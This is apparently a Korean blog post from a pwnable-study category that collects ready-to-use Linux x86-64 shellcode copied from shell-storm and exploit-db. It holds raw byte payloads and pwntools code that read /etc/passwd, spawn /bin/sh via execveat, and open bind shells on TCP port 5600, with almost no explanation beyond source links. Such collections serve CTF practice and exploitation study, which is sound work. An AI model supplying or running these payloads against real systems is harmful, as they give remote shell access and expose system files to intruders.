유용한 쉘코드 모음
참고: https://shell-storm.org/shellcode/index.html
Shellcodes database for study cases
API It is very straightforward to communicate with this API. Just send a simple GET method. The "s" argument contains your keyword. http://shell-storm.org/api/?s= Use "*" for multiple keywords search. /?s= * * The output should be like this: :::: :::: ::::
shell-storm.org
1. orw shellcode
출처: https://shell-storm.org/shellcode/files/shellcode-878.html
Linux/x86-64 - Read /etc/passwd - 82 bytes
shell-storm.org
# orw shellcode
sc="\xeb\x3f\x5f\x80\x77\x0b\x41\x48\x31\xc0\x04\x02\x48\x31\xf6\x0f\x05\x66\x81\xec\xff\x0f\x48\x8d\x34\x24\x48\x89\xc7\x48\x31\xd2\x66\xba\xff\x0f\x48\x31\xc0\x0f\x05\x48\x31\xff\x40\x80\xc7\x01\x48\x89\xc2\x48\x31\xc0\x04\x01\x0f\x05\x48\x31\xc0\x04\x3c\x0f\x05\xe8\xbc\xff\xff\xff"
sc+="/etc/passwdA"
2. orw shellcode using pwntools
from pwn import *
#sc = shellcraft.pushstr(b'/etc/passwd')
#sc += shellcraft.open('rsp')
sc = shellcraft.open(b'/etc/passwd')
sc += shellcraft.read('rax', 'rsp', 0x100)
sc += shellcraft.write(1, 'rsp', 0x100)
print(sc)
sc = asm(sc)
print(len(sc))
print(disasm(sc))
3. evecveat
출처: ...
# 0x166 systemcall
# execveat shellcode
sc=b"\x6a\x42\x58\xfe\xc4\x48\x99\x52\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5e\x49\x89\xd0\x49\x89\xd2\x0f\x05"
print(disasm(sc))
4. bind shell 5600
출처: https://www.exploit-db.com/exploits/41128
Linux/x64 - Bind (5600/TCP) Shell Shellcode (87 bytes)
Linux/x64 - Bind (5600/TCP) Shell Shellcode (87 bytes) EDB-ID: 41128 CVE: N/A Date: 2017-01-19
www.exploit-db.com
sc="\x48\x31\xc0\x48\x31\xd2\x48\x31\xf6\xff\xc6\x6a\x29\x58\x6a\x02\x5f\x0f\x05\x48\x97\x6a\x02\x66\xc7\x44\x24\x02\x15\xe0\x54\x5e\x52\x6a\x31\x58\x6a\x10\x5a\x0f\x05\x5e\x6a\x32\x58\x0f\x05\x6a\x2b\x58\x0f\x05\x48\x97\x6a\x03\x5e\xff\xce\xb0\x21\x0f\x05\x75\xf8\xf7\xe6\x52\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x8d\x3c\x24\xb0\x3b\x0f\x05"
출처: https://www.exploit-db.com/exploits/39718
Linux/x64 - Bind (5600/TCP) Shell Shellcode (86 bytes)
Linux/x64 - Bind (5600/TCP) Shell Shellcode (86 bytes) EDB-ID: 39718 CVE: N/A Date: 2016-04-21
www.exploit-db.com
sc="\x48\x31\xc0\x48\x31\xf6\x99\x6a\x29\x58\xff\xc6\x6a\x02\x5f\x0f\x05\x48\x97\x6a\x02\x66\xc7\x44\x24\x02\x15\xe0\x54\x5e\x52\x6a\x10\x5a\x6a\x31\x58\x0f\x05\x50\x5e\x6a\x32\x58\x0f\x05\x6a\x2b\x58\x0f\x05\x48\x97\x6a\x03\x5e\xff\xce\xb0\x21\x0f\x05\x75\xf8\x48\x31\xc0\x99\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x54\x5f\x6a\x3b\x58\x0f\x05"
출처: https://www.hackthesec.co.in/2016/04/linuxx8664-bindshell-port-5600-81-bytes.html
Linux/x86_64 - bindshell (PORT: 5600) - 81 bytes Exploit
Hack The Sec-Leading Resource of Linux Tutorial,Linux Tips And Tricks,Linux Server,Linux Exploit,Shell scripting,linux books,unix,bash scripting.
www.hackthesec.co.in
sc="\x99\x6a\x29\x58\x6a\x01\x5e\x6a\x02\x5f\x0f\x05\x48\x97\x6a\x02\x66\xc7\x44\x24\x02\x15\xe0\x54\x5e\x52\x6a\x10\x5a\x6a\x31\x58\x0f\x05\x50\x5e\x6a\x32\x58\x0f\x05\x6a\x2b\x58\x0f\x05\x48\x97\x6a\x03\x5e\x48\xff\xce\x6a\x21\x58\x0f\x05\x75\xf6\x99\x52\x48\xb9\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x51\x54\x5f\x6a\x3b\x58\x0f\x05"
.
'퍼너블 > Shellcode' 카테고리의 다른 글
| [ShellCode] setreuid, getuid, execve (39 bytes) (0) | 2016.11.09 |
|---|---|
| [ShellCode] Linux/x86 file reader (65 bytes + pathname) (0) | 2016.11.09 |
댓글